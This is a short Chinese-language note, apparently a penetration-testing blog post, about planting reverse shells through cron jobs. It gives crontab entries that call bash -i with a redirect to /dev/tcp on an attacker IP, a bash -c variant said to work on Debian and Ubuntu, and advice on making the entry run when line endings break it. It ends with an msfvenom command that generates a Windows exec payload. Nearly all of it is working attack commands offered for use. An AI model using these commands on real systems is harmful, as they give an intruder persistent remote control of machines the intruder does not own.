反弹shell的一些东西

 反弹shell 格式问题

在写计划任务反弹shell的时候VPS如果是centos那么直接写

*/1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1

但是在实际测试中debian和ubuntu系统这样写是执行不了的，

需要加上 bash -c " "

*/1 * * * * root bash -c "bash -i >& /dev/tcp/IP/666 0>&1"

这样就能执行，成功反弹shell了

 

当然有时候会出现写进去的定时任务死活不执行，弹不过来

可能是换行问题，但很大可能我觉得是：

这个文件是在windows写的 ，而宿主机是linux系统，那么这时候就在linux上写好文件直接传到宿主机 这样就能成功执行了！（亲测linux下写的命令有换行也能反弹）

 

msf生成攻击命令

 

msfvenom -p windows/exec CMD = calc.exe EXITFUNC=thread -f c